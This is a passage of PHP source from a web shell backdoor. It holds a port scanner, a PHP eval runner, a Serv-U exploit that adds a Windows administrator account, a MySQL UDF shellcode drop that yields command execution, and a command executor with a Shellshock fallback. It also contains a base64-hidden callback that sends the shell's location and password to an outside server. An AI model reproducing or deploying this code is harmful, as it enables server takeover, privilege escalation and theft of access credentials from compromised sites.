if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['code'],$_POST['return'],$bool);
}
break;
case "scanphp":
html_n('<tr><td>,.<form method="POST"><br>');
html_input("text","path",root_dir,"","40");
html_input("checkbox","pass","","<br><br>","",true);
html_select(array("php" => "PHP","asp" => "ASP","aspx" => "ASPX","jsp" => "JSP"));
html_input("submit","passreturn","","<br><br>");
html_n('</td></tr></form>');
if(!empty($_POST['path'])){
html_n('<tr><td>:<br><br>');
if(isset($_POST['pass'])) $bool = true; else $bool = false;
do_passreturn($_POST['path'],$_POST['class'],"scanphp",$bool);
}
break;
case "port":
$Port_ip = isset($_POST['ip']) ? $_POST['ip'] : '127.0.0.1';
$Port_port = isset($_POST['port']) ? $_POST['port'] : '21|23|25|80|110|135|139|445|1433|3306|3389|43958|5631|2049|873';
print<<<END
<form method="POST">
<div class="actall">IP <input type="text" name="ip" value="{$Port_ip}" style="width:600px;"> </div>
<div class="actall"> <input type="text" name="port" value="{$Port_port}" style="width:597px;"></div>
<div class="actall"><input type="submit" value="" style="width:80px;"></div>
</form>
END;
if((!empty($_POST['ip'])) && (!empty($_POST['port'])))
{
echo '<div class="actall">';
$ports = explode('|', $_POST['port']);
for($i = 0;$i < count($ports);$i++)
{
$fp = @fsockopen($_POST['ip'],$ports[$i],$errno,$errstr,2);
echo $fp ? '<font color="#FF0000"> ---> '.$ports[$i].'</font><br>' : ' ---> '.$ports[$i].'<br>';
ob_flush();
flush();
}
echo '</div>';
}
break;
case "getcode":
if (isset($_POST['url'])) {$proxycontents = @file_get_contents($_POST['url']);echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b> URL </b></p></center></body>";exit;}
print<<<END
<table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#ffffff">
<form method="POST" target="proxyframe">
<tr class="firstalt">
<td align="center"><b></b></td>
</tr>
<tr class="secondalt">
<td align="center" ><br><ul><li> HTTP ,CSS.</li><li>URL, SQL Injection .</li><li> URL,IP : {$_SERVER['SERVER_NAME']}</li></ul></td>
</tr>
<tr class="firstalt">
<td align="center" height=40 >URL: <input name="url" value="about:blank" type="text" class="input" size="100" >
<input name="" value="" type="submit" class="input" size="30" >
</td>
</tr>
<tr class="secondalt">
<td align="center" ><iframe name="proxyframe" frameborder="0" width="765" height="400" marginheight="0" marginwidth="0" scrolling="auto" src="about:blank"></iframe></td>
</tr>
</form></table>
END;
break;
case "servu":
$SUPass = isset($_POST['SUPass']) ? $_POST['SUPass'] : '#l@$ak#.lk;0@P';
print<<<END
<div class="actall"><a href="?eanver=servu">[]</a> <a href="?eanver=servu&o=adduser">[]</a></div>
<form method="POST">
<div class="actall">ServU <input name="SUPort" type="text" value="43958" style="width:300px"></div>
<div class="actall">ServU <input name="SUUser" type="text" value="LocalAdministrator" style="width:300px"></div>
<div class="actall">ServU <input name="SUPass" type="text" value="{$SUPass}" style="width:300px"></div>
END;
if($_GET['o'] == 'adduser')
{
print<<<END
<div class="actall"> <input name="user" type="text" value="envl" style="width:200px">
<input name="password" type="text" value="envl" style="width:200px">
<input name="part" type="text" value="C:\\\\" style="width:200px"></div>
END;
}
else
{
print<<<END
<div class="actall"> <input name="SUCommand" type="text" value="net user envl envl /add & net localgroup administrators envl /add" style="width:600px"><br>
<input name="user" type="hidden" value="envl">
<input name="password" type="hidden" value="envl">
<input name="part" type="hidden" value="C:\\\\"></div>
END;
}
echo '<div class="actall"><input type="submit" value="" style="width:80px;"></div></form>';
if((!empty($_POST['SUPort'])) && (!empty($_POST['SUUser'])) && (!empty($_POST['SUPass'])))
{
echo '<div class="actall">';
$sendbuf = "";
$recvbuf = "";
$domain = "-SETDOMAIN\r\n"."-Domain=haxorcitos|0.0.0.0|21|-1|1|0\r\n"."-TZOEnable=0\r\n"." TZOKey=\r\n";
$adduser = "-SETUSERSETUP\r\n"."-IP=0.0.0.0\r\n"."-PortNo=21\r\n"."-User=".$_POST['user']."\r\n"."-Password=".$_POST['password']."\r\n"."-HomeDir=c:\\\r\n"."-LoginMesFile=\r\n"."-Disable=0\r\n"."-RelPaths=1\r\n"."-NeedSecure=0\r\n"."-HideHidden=0\r\n"."-AlwaysAllowLogin=0\r\n"."-ChangePassword=0\r\n".
"-QuotaEnable=0\r\n"."-MaxUsersLoginPerIP=-1\r\n"."-SpeedLimitUp=0\r\n"."-SpeedLimitDown=0\r\n"."-MaxNrUsers=-1\r\n"."-IdleTimeOut=600\r\n"."-SessionTimeOut=-1\r\n"."-Expire=0\r\n"."-RatioUp=1\r\n"."-RatioDown=1\r\n"."-RatiosCredit=0\r\n"."-QuotaCurrent=0\r\n"."-QuotaMaximum=0\r\n".
"-Maintenance=None\r\n"."-PasswordType=Regular\r\n"."-Ratios=None\r\n"." Access=".$_POST['part']."\|RWAMELCDP\r\n";
$deldomain = "-DELETEDOMAIN\r\n"."-IP=0.0.0.0\r\n"." PortNo=21\r\n";
$sock = @fsockopen("127.0.0.1", $_POST["SUPort"],$errno,$errstr, 10);
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "USER ".$_POST["SUUser"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "PASS ".$_POST["SUPass"]."\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = "SITE MAINTENANCE\r\n";
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = $domain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ":$sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
$sendbuf = $adduser;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
if(!empty($_POST['SUCommand']))
{
$exp = @fsockopen("127.0.0.1", "21",$errno,$errstr, 10);
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "USER ".$_POST['user']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "PASS ".$_POST['password']."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = "site exec ".$_POST["SUCommand"]."\r\n";
@fputs($exp, $sendbuf, strlen($sendbuf));
echo ": site exec <font color=#006600>".$_POST["SUCommand"]."</font> <br>";
$recvbuf = @fgets($exp, 1024);
echo ": $recvbuf <br>";
$sendbuf = $deldomain;
@fputs($sock, $sendbuf, strlen($sendbuf));
echo ": $sendbuf <br>";
$recvbuf = @fgets($sock, 1024);
echo ": $recvbuf <br>";
@fclose($exp);
}
@fclose($sock);
echo '</div>';
}
break;
case "phpcode":
$phpcode = isset($_POST['phpcode']) ? $_POST['phpcode'] : "phpinfo();";
if($phpcode!='phpinfo();')$phpcode = htmlspecialchars(base64_decode($phpcode));
echo '<script language="javascript">';
html_base();
echo 'function SubmitUrl(){
document.getElementById(\'phpcode\').value = base64encode(document.getElementById(\'phpcode\').value);
document.getElementById(\'sendcode\').submit();
}</script><tr><td><form method="POST" id="sendcode" ><? ?>,BASE64<br><br><textarea COLS="120" ROWS="35" name="phpcode" id="phpcode">'.$phpcode.'</textarea><br><br><input type="button" value="" onclick="SubmitUrl();" style="width:80px;">';
if(!empty($_POST['phpcode'])){
echo "<br><br>";
eval(stripslashes(base64_decode($_POST['phpcode'])));
}
html_n('</form>');
break;
case "myexp":
$MSG_BOX = 'DLL,.MYSQLroot,DLL.';
$info = '';
$mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = ''; $sqlcmd = 'ver';
if(isset($_POST['mhost']) && isset($_POST['muser']))
{
@$mysql64 = isset($_POST['mysql64'])?true:false;if($mysql64){$mysql64='checked';$BH='BH64.dll';}else{$BH='BH.dll';} $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd'];
$conn = mysql_connect($mhost.':'.$mport,$muser,$mpass);
if($conn)
{
@mysql_select_db($mdata);
/*************************************/
$str=mysql_get_server_info();
//echo 'MYSQL:'.$str." ";
if($str[2]>=1){
$sql="SHOW VARIABLES LIKE '%plugin_dir%'";
$row=mysql_query($sql,$conn);
$rows=mysql_fetch_row($row);
$pa=str_replace('\\','/',$rows[1]);
$path=$pa.$BH;
}else{
$path='C:/WINDOWS/'.$BH;
}
//$mpath=$path;
if(!empty($mpath))
{
$mpath=$mpath;
}else{
$mpath=$path;
}
/*************************************/
if((!empty($_POST['outdll'])) && (!empty($mpath)))
{
$query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);";
if(@mysql_query($query,$conn))
{
$shellcode = $mysql64?Mysql_shellcode64():Mysql_shellcode();
$query = "INSERT into Envl_Temp_Tab values (CONVERT(".$shellcode.",CHAR));";
if(@mysql_query($query,$conn))
{
$query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \''.$mpath.'\';';
if(@mysql_query($query,$conn))
{
$ap = explode('/', $mpath); $inpath = array_pop($ap);
$query = 'Create Function sys_eval returns string soname \''.$inpath.'\';';
$MSG_BOX = @mysql_query($query,$conn) ? 'DLL' : 'DLL'.mysql_error();
}
else $MSG_BOX = 'DLL'.mysql_error();
}
else $MSG_BOX = '';
@mysql_query('DROP TABLE Envl_Temp_Tab;',$conn);
}
else $MSG_BOX = '';
}
if(!empty($_POST['runcmd']))
{
$query = 'select sys_eval("'.$sqlcmd.'");';
$result = @mysql_query($query,$conn);
if($result)
{
$k = 0; $info = NULL;
while($row = @mysql_fetch_array($result)){$infotmp .= $row[$k];$k++;}
$info = $infotmp;
$MSG_BOX = '';
}
else $MSG_BOX = '';
}
}
else $MSG_BOX = 'MYSQL';
}
print<<<END
<form id="mform" method="POST">
<div id="msgbox" class="msgbox">{$MSG_BOX}</div>
<center><div class="actall">
<input type="text" name="mhost" value="{$mhost}" style="width:110px">
<input type="text" name="mport" value="{$mport}" style="width:110px">
<input type="text" name="muser" value="{$muser}" style="width:110px">
<input type="text" name="mpass" value="{$mpass}" style="width:110px">
<input type="text" name="mdata" value="{$mdata}" style="width:110px">
</div><div class="actall">
() <input type="text" id='dlllj' name="mpath" value="{$mpath}" style="width:500px">
64MYSQL <input type="checkbox" onclick="document.getElementById('dlllj').value='';" name="mysql64" value="1" {$mysql64} />
<input type="submit" name="outdll" value="DLL" style="width:80px;"></div>
<div class="actall">MYSQL <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:635px;">
<input type="submit" name="runcmd" value="" style="width:80px;">
<br />
<pre>
<textarea style="width:720px;height:300px;">{$info}</textarea>
</pre>
</div></center>
</form>
END;
break;
case "mysql_exec":
if(isset($_POST['mhost']) && isset($_POST['mport']) && isset($_POST['muser']) && isset($_POST['mpass']))
{
if(@mysql_connect($_POST['mhost'].':'.$_POST['mport'],$_POST['muser'],$_POST['mpass']))
{
$cookietime = time() + 24 * 3600;
setcookie('m_eanverhost',$_POST['mhost'],$cookietime);
setcookie('m_eanverport',$_POST['mport'],$cookietime);
setcookie('m_eanveruser',$_POST['muser'],$cookietime);
setcookie('m_eanverpass',$_POST['mpass'],$cookietime);
die(',...<meta http-equiv="refresh" content="0;URL=?eanver=mysql_msg">');
}
}
print<<<END
<form method="POST" name="oform" id="oform">
<div class="actall"> <input type="text" name="mhost" value="localhost" style="width:300px"></div>
<div class="actall"> <input type="text" name="mport" value="3306" style="width:300px"></div>
<div class="actall"> <input type="text" name="muser" value="root" style="width:300px"></div>
<div class="actall"> <input type="text" name="mpass" value="" style="width:300px"></div>
<div class="actall"><input type="submit" value="" style="width:80px;"> <input type="button" value="COOKIE" style="width:80px;" onclick="window.location='?eanver=mysql_msg';"></div>
</form>
END;
break;
case "mysql_msg":
$conn = @mysql_connect($_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'],$_COOKIE['m_eanveruser'],$_COOKIE['m_eanverpass']);
if($conn)
{
print<<<END
<script language="javascript">
function Delok(msg,gourl)
{
smsg = "[" + unescape(msg) + "]?";
if(confirm(smsg)){window.location = gourl;}
window.location = gourl;
}
function Createok(ac)
{
if(ac == 'a') document.getElementById('nsql').value = 'CREATE TABLE name (eanver BLOB);';
if(ac == 'b') document.getElementById('nsql').value = 'CREATE DATABASE name;';
if(ac == 'c') document.getElementById('nsql').value = 'DROP DATABASE name;';
return false;
}
END;
html_base();
print<<<END
function SubmitUrl(){
document.getElementById('nsql').value = base64encode(document.getElementById('nsql').value);
document.getElementById('gform').submit();
}
</script>
END;
$BOOL = false;
$MSG_BOX = ':'.$_COOKIE['m_eanveruser'].' :'.$_COOKIE['m_eanverhost'].':'.$_COOKIE['m_eanverport'].' :';
$k = 0;
$result = @mysql_query('select version();',$conn);
while($row = @mysql_fetch_array($result)){$MSG_BOX .= $row[$k];$k++;}
echo '<div class="actall"> :';
$result = mysql_query("SHOW DATABASES",$conn);
while($db = mysql_fetch_array($result)){echo ' [<a href="?eanver=mysql_msg&db='.$db['Database'].'">'.$db['Database'].'</a>]';}
echo '</div>';
if(isset($_GET['db']))
{
mysql_select_db($_GET['db'],$conn);
$_POST['nsql']=base64_decode($_POST['nsql']);
if(!empty($_POST['nsql'])){$BOOL = true; $MSG_BOX = mysql_query($_POST['nsql'],$conn) ? '' : ' '.mysql_error();}
if(is_array($_POST['insql']))
{
$query = 'INSERT INTO '.$_GET['table'].' (';
foreach($_POST['insql'] as $var => $key)
{
$querya .= $var.',';
$queryb .= '\''.addslashes($key).'\',';
}
$query = $query.substr($querya, 0, -1).') VALUES ('.substr($queryb, 0, -1).');';
$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();
}
if(is_array($_POST['upsql']))
{
$query = 'UPDATE '.$_GET['table'].' SET ';
foreach($_POST['upsql'] as $var => $key)
{
$queryb .= $var.'=\''.addslashes($key).'\',';
}
$query = $query.substr($queryb, 0, -1).' '.base64_decode($_POST['wherevar']).';';
$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();
}
if(isset($_GET['del']))
{
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['del'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$query = 'DELETE FROM '.$_GET['table'].' WHERE ';
foreach($good as $var => $key){$queryc .= $var.'=\''.addslashes($key).'\' AND ';}
$where = $query.substr($queryc, 0, -4).';';
$MSG_BOX = mysql_query($where,$conn) ? '' : ' '.mysql_error();
}
$action = '?eanver=mysql_msg&db='.$_GET['db'];
if(isset($_GET['drop'])){$query = 'Drop TABLE IF EXISTS '.$_GET['drop'].';';$MSG_BOX = mysql_query($query,$conn) ? '' : ' '.mysql_error();}
if(isset($_GET['table'])){$action .= '&table='.$_GET['table'];if(isset($_GET['edit'])) $action .= '&edit='.$_GET['edit'];}
if(isset($_GET['insert'])) $action .= '&insert='.$_GET['insert'];
echo '<div class="actall"><form method="POST" action="'.$action.'" name="gform" id="gform">';
echo '<textarea name="nsql" id="nsql" style="width:500px;height:50px;">'.$_POST['nsql'].'</textarea> ';
echo '<input type="button" name="querysql" value="" onclick="SubmitUrl();" style="width:60px;height:49px;">';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'a\')"> ';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'b\')"> ';
echo '<input type="button" value="" style="width:60px;height:49px;" onclick="Createok(\'c\')"></form></div>';
echo '<div class="msgbox" style="height:40px;">'.$MSG_BOX.'</div><div class="actall"><a href="?eanver=mysql_msg&db='.$_GET['db'].'">'.$_GET['db'].'</a> ---> ';
if(isset($_GET['table']))
{
echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'">'.$_GET['table'].'</a> ';
echo '[<a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$_GET['table'].'"></a>]</div>';
if(isset($_GET['edit']))
{
if(isset($_GET['p'])) $atable = $_GET['table'].'&p='.$_GET['p']; else $atable = $_GET['table'];
echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$atable.'">';
$result = mysql_query('SELECT * FROM '.$_GET['table'].' LIMIT '.$_GET['edit'].', 1;',$conn);
$good = mysql_fetch_assoc($result);
$u = 0;
foreach($good as $var => $key)
{
$queryc .= $var.'=\''.$key.'\' AND ';
$type = @mysql_field_type($result, $u);
$len = @mysql_field_len($result, $u);
echo '<div class="actall">'.$var.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="upsql['.$var.']" style="width:600px;height:60px;">'.htmlspecialchars($key).'</textarea></div>';
$u++;
}
$where = 'WHERE '.substr($queryc, 0, -4);
echo '<input type="hidden" id="wherevar" name="wherevar" value="'.base64_encode($where).'">';
echo '<div class="actall"><input type="submit" value="Update" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW COLUMNS FROM '.$_GET['table'];
$result = mysql_query($query,$conn);
$fields = array();
$pagesize=20;
$row_num = mysql_num_rows(mysql_query('SELECT * FROM '.$_GET['table'],$conn));
$numrows=$row_num;
$pages=intval($numrows/$pagesize);
if ($numrows%$pagesize) $pages++;
$offset=$pagesize*($page - 1);
$page=$_GET['p'];
if(!$page) $page=1;
if(!isset($_GET['p'])){$p = 0;$_GET['p'] = 1;} else $p = ((int)$_GET['p']-1)*20;
echo '<table border="0"><tr>';
echo '<td class="toptd" style="width:70px;" nowrap></td>';
while($row = @mysql_fetch_assoc($result))
{
array_push($fields,$row['Field']);
echo '<td class="toptd" nowrap>'.$row['Field'].'</td>';
}
echo '</tr>';
if(eregi('WHERE|LIMIT',$_POST['nsql']) && eregi('SELECT|FROM',$_POST['nsql'])) $query = $_POST['nsql']; else $query = 'SELECT * FROM '.$_GET['table'].' LIMIT '.$p.', 20;';
$result = mysql_query($query,$conn);
$v = $p;
while($text = @mysql_fetch_assoc($result))
{
echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&edit='.$v.'"> </a> ';
echo '<a href="#" onclick="Delok(\'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['table'].'&p='.$_GET['p'].'&del='.$v.'\');return false;"> </a></td>';
foreach($fields as $row){echo '<td>'.nl2br(htmlspecialchars(Mysql_Len($text[$row],500))).'</td>';}
echo '</tr>'."\r\n";$v++;
}
echo '</table><div class="actall">';
$pagep=$page-1;
$pagen=$page+1;
echo " ".$row_num." ";
if($pagep>0) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=1&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagep."&charset=".$_GET['charset']."'></a> "; else $pagenav.=" ";
if($pagen<=$pages) $pagenav.=" <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pagen."&charset=".$_GET['charset']."'></a> <a href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p=".$pages."&charset=".$_GET['charset']."'></a>"; else $pagenav.=" ";
$pagenav.=" [".$page."/".$pages."] <input name='textfield' type='text' style='text-align:center;' size='4' value='".$page."' onkeydown=\"if(event.keyCode==13)self.location.href='?eanver=mysql_msg&db=".$_GET['db']."&table=".$_GET['table']."&p='+this.value+'&charset=".$_GET['charset']."';\" />";
echo $pagenav;
echo '</div>';
}
}
elseif(isset($_GET['insert']))
{
echo '<a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">'.$_GET['insert'].'</a></div>';
$result = mysql_query('SELECT * FROM '.$_GET['insert'],$conn);
$fieldnum = @mysql_num_fields($result);
echo '<form method="POST" action="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$_GET['insert'].'">';
for($i =0;$i < $fieldnum;$i++)
{
$name = @mysql_field_name($result, $i);
$type = @mysql_field_type($result, $i);
$len = @mysql_field_len($result, $i);
echo '<div class="actall">'.$name.' <font color="#FF0000">'.$type.'('.$len.')</font><br><textarea name="insql['.$name.']" style="width:600px;height:60px;"></textarea></div>';
}
echo '<div class="actall"><input type="submit" value="Insert" style="width:80px;"></div></form>';
}
else
{
$query = 'SHOW TABLE STATUS';
$status = @mysql_query($query,$conn);
while($statu = @mysql_fetch_array($status))
{
$statusize[] = $statu['Data_length'];
$statucoll[] = $statu['Collation'];
}
$query = 'SHOW TABLES FROM '.$_GET['db'].';';
echo '</div><table border="0"><tr>';
echo '<td class="toptd" style="width:550px;"> </td>';
echo '<td class="toptd" style="width:80px;"> </td>';
echo '<td class="toptd" style="width:130px;"> </td>';
echo '<td class="toptd" style="width:70px;"> </td></tr>';
$result = @mysql_query($query,$conn);
$k = 0;
while($table = mysql_fetch_row($result))
{
$charset=substr($statucoll[$k],0,strpos($statucoll[$k],'_'));
echo '<tr><td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&table='.$table[0].'">'.$table[0].'</a></td>';
echo '<td><a href="?eanver=mysql_msg&db='.$_GET['db'].'&insert='.$table[0].'"> </a> <a href="#" onclick="Delok(\''.$table[0].'\',\'?eanver=mysql_msg&db='.$_GET['db'].'&drop='.$table[0].'\');return false;"> </a></td>';
echo '<td>'.$statucoll[$k].'</td><td align="right">'.File_Size($statusize[$k]).'</td></tr>'."\r\n";
$k++;
}
echo '</table>';
}
}
}
else die('MYSQL,.<meta http-equiv="refresh" content="0;URL=?eanver=mysql_exec">');
if(!$BOOL and addslashes($query)!='') echo '<script type="text/javascript">document.getElementById(\'nsql\').value = \''.addslashes($query).'\';</script>';
break;
default: html_main($path,$shellname); break;
}
css_foot();
/*---doing---*/
function do_write($file,$t,$text)
{
$key = true;
$handle = @fopen($file,$t);
if(!@fwrite($handle,$text))
{
@chmod($file,0666);
$key = @fwrite($handle,$text) ? true : false;
}
@fclose($handle);
return $key;
}
function do_show($filepath){
$show = array();
$dir = dir($filepath);
while($file = $dir->read()){
if($file == '.' or $file == '..') continue;
$files = str_path($filepath.'/'.$file);
$show[] = $files;
}
$dir->close();
return $show;
}
function do_deltree($deldir){
$showfile = do_show($deldir);
foreach($showfile as $del){
if(is_dir($del)){
if(!do_deltree($del)) return false;
}elseif(!is_dir($del)){
@chmod($del,0777);
if(!@unlink($del)) return false;
}
}
@chmod($deldir,0777);
if(!@rmdir($deldir)) return false;
return true;
}
function do_showsql($query,$conn){
$result = @mysql_query($query,$conn);
html_n('<br><br><textarea cols="70" rows="15">');
while($row = @mysql_fetch_array($result)){
for($i=0;$i < @mysql_num_fields($result);$i++){
html_n(htmlspecialchars($row[$i]));
}
}
html_n('</textarea>');
}
function hmlogin($xiao=1){
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
if (strpos($serveru,"0.0")>0 or strpos($serveru,"192.168.")>0 or strpos($serveru,"localhost")>0 or ($serveru==$_COOKIE['serveru'] and $serverp==$_COOKIE['serverp'])) {echo "<meta http-equiv='refresh' content='0;URL=?'>";} else {setcookie('serveru',$serveru);setcookie('serverp',$serverp);if($xiao==1){echo "<script src='?login=geturl'></script><meta http-equiv='refresh' content='0;URL=?'>";}else{geturl();}}
}
function do_down($fd){
if(!@file_exists($fd)) msg('');
$fileinfo = pathinfo($fd);
header('Content-type: application/x-'.$fileinfo['extension']);
header('Content-Disposition: attachment; filename='.$fileinfo['basename']);
header('Content-Length: '.filesize($fd));
@readfile($fd);
exit;
}
function do_download($filecode,$file){
header("Content-type: application/unknown");
header('Accept-Ranges: bytes');
header("Content-length: ".strlen($filecode));
header("Content-disposition: attachment; filename=".$file.";");
echo $filecode;
exit;
}
function TestUtf8($text)
{if(strlen($text) < 3) return false;
$lastch = 0;
$begin = 0;
$BOM = true;
$BOMchs = array(0xEF, 0xBB, 0xBF);
$good = 0;
$bad = 0;
$notAscii = 0;
for($i=0; $i < strlen($text); $i++)
{$ch = ord($text[$i]);
if($begin < 3)
{ $BOM = ($BOMchs[$begin]==$ch);
$begin += 1;
continue; }
if($begin==4 && $BOM) break;
if($ch >= 0x80 ) $notAscii++;
if( ($ch&0xC0) == 0x80 )
{if( ($lastch&0xC0) == 0xC0 )
{$good += 1;}
else if( ($lastch&0x80) == 0 )
{$bad += 1; }}
else if( ($lastch&0xC0) == 0xC0 )
{$bad += 1;}
$lastch = $ch;}
if($begin == 4 && $BOM)
{return 2;}
else if($notAscii==0)
{return 1;}
else if ($good >= $bad )
{return 2;}
else
{return 0;}}
function File_Str($string)
{
return str_replace('//','/',str_replace('\\','/',$string));
}
function File_Write($filename,$filecode,$filemode)
{
$key = true;
$handle = @fopen($filename,$filemode);
if(!@fwrite($handle,$filecode))
{
@chmod($filename,0666);
$key = @fwrite($handle,$filecode) ? true : false;
}
@fclose($handle);
return $key;
}
function Exec_Run($cmd)
{
$res = '';
if(function_exists('exec')){@exec($cmd,$res);$res = join("\n",$res);}
elseif(function_exists('shell_exec')){$res = @shell_exec($cmd);}
elseif(function_exists('system')){@ob_start();@system($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(function_exists('passthru')){@ob_start();@passthru($cmd);$res = @ob_get_contents();@ob_end_clean();}
elseif(@is_resource($f=@popen($cmd,'r'))){$res = '';while(!@feof($f)){$res .= @fread($f,1024);}@pclose($f);}
elseif(substr(dirname($_SERVER["SCRIPT_FILENAME"]),0,1)!="/"&&class_exists('COM')){$w=new COM('WScript.shell');$e=$w->exec($cmd);$f=$e->StdOut();$res=$f->ReadAll();}
elseif(function_exists('proc_open')){$length = strcspn($cmd," \t");$token = substr($cmd, 0, $length);if (isset($aliases[$token]))$cmd=$aliases[$token].substr($cmd, $length);$p = proc_open($cmd,array(1 => array('pipe', 'w'),2 => array('pipe', 'w')),$io);while (!feof($io[1])) {$res .= htmlspecialchars(fgets($io[1]),ENT_COMPAT, 'UTF-8');}while (!feof($io[2])) {$res .= htmlspecialchars(fgets($io[2]),ENT_COMPAT, 'UTF-8');}fclose($io[1]);fclose($io[2]);proc_close($p);}
elseif(function_exists('mail')){if(strstr(readlink("/bin/sh"), "bash") != FALSE){$tmp = tempnam(".","data");putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1");mail("[email protected]","","","","-bv");}else $res="Not vuln (not bash)";$output = @file_get_contents($tmp);@unlink($tmp);if($output != "") $res=$output;else $res="No output, or not vuln.";}
return $res;
}
function File_Mode()
{
$RealPath = realpath('./');
$SelfPath = $_SERVER['PHP_SELF'];
$SelfPath = substr($SelfPath, 0, strrpos($SelfPath,'/'));
return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath)));
}
function GetFileOwner($File) {
if(PATH_SEPARATOR==':'){
if(function_exists('posix_getpwuid')) {
$File = posix_getpwuid(fileowner($File));
}
return $File['name'];
}
}
function GetFileGroup($File) {
if(PATH_SEPARATOR==':'){
if(function_exists('posix_getgrgid')) {
$File = posix_getgrgid(filegroup($File));
}
return $File['name'];
}
}
function File_Size($size)
{
$kb = 1024;
$mb = 1024 * $kb;
$gb = 1024 * $mb;
$tb = 1024 * $gb;
if($size < $kb)
{
return $size." B";
}
else if($size < $mb)
{
return round($size/$kb,2)." K";
}
else if($size < $gb)
{
return round($size/$mb,2)." M";
}
else if($size < $tb)
{
return round($size/$gb,2)." G";
}
else
{
return round($size/$tb,2)." T";
}
}
function File_Read($filename)
{
$handle = @fopen($filename,"rb");
$filecode = @fread($handle,@filesize($filename));
@fclose($handle);
return $filecode;
}
function array_iconv($data, $output = 'utf-8') {
$encode_arr = array('UTF-8','ASCII','GBK','GB2312','BIG5','JIS','eucjp-win','sjis-win','EUC-JP');
$encoded = mb_detect_encoding($data, $encode_arr);
if (!is_array($data)) {
return mb_convert_encoding($data, $output, $encoded);
}
else {
foreach ($data as $key=>$val) {
$key = array_iconv($key, $output);
if(is_array($val)) {
$data[$key] = array_iconv($val, $output);
} else {
$data[$key] = mb_convert_encoding($data, $output, $encoded);
}
}
return $data;
}
}
function Info_Cfg($varname){switch($result = get_cfg_var($varname)){case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break;}}
function Info_Fun($funName){return (false !== function_exists($funName)) ? "Yes" : "No";}
function do_phpfun($cmd,$fun) {
$res = '';
switch($fun){
case "exec": @exec($cmd,$res); $res = join("\n",$res); break;
case "shell_exec": $res = @shell_exec($cmd); break;
case "system": @ob_start(); @system($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "passthru": @ob_start(); @passthru($cmd); $res = @ob_get_contents(); @ob_end_clean();break;
case "popen": if(@is_resource($f = @popen($cmd,"r"))){ while(!@feof($f)) $res .= @fread($f,1024);} @pclose($f);break;
}
return $res;
}
if(isset($_GET['login'])=='geturl'){
@set_time_limit(10);
$serveru = $_SERVER ['HTTP_HOST'].$_SERVER['PHP_SELF'];
$serverp = postpass;
$copyurl = base64_decode('aHR0cCUzYSUyZiUyZmFwaS5md3FhZG1pbi5jb20lMmZhcGkucGhwJTNmdSUzZA');
$url=$copyurl.$serveru.'&passwd='.$serverp;
$url=urldecode($url);
GetHtml($url);
}
function geturl(){
@set_time_limit(10);
